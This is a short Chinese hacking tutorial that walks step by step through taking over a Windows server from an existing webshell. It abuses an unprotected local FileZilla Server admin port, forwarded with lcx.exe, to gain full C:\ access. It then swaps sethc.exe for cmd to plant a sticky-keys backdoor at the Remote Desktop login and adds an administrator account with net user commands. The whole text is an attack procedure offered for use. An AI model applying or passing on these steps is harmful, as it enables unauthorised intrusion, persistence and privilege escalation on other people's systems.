話不多說,我們直接操作!
首先我們通過 webshell 找到 FileZilla 的文件目錄,找到 FileZilla Server Interface.xml 文件,打開。我們可以看到它的連接地址:127.0.0.1 及端口:14147,密碼這里為空。
在得到以上基本信息后,我們找到可讀寫文件,上傳 lcx.exe 端口轉發程序。因為從以上信息我們可以知道,它只偵聽在本地的14147端口上。
然后執行端口轉發命令:
lcx.exe -tran 14148 127.0.0.1 14147
接着我們在我們本地機器上,通過 FileZilla 的服務端程序,來連接它!地址填寫,目標地址端口為轉發后的14148 端口,密碼為空!
我們成功連接上了!現在我們來添加用戶,並將我們的分享目錄改為 c:\ 盤,並賦予足夠大的權限!
在擁有賬戶和 c:\ 控制權后,我們再通過 FileZilla 的客戶端來進行正常連接!我們可以看到成功連接!
現在,我們就用自己准備好的cmd客戶端,替換 system32 下的 sethc.exe ,並選擇 覆蓋 !
最后我們來通過 遠程桌面來進行連接!在登錄界面,我們連續按 5 下 shift 鍵,可以看到成功調出 cmd 的命令客戶端!
我們來添加一個用戶,並將其提升為管理員權限!
net user secist 123 /add
net localgroup administrator secist /add
這樣,我們就成功取得了該服務器的控制權限!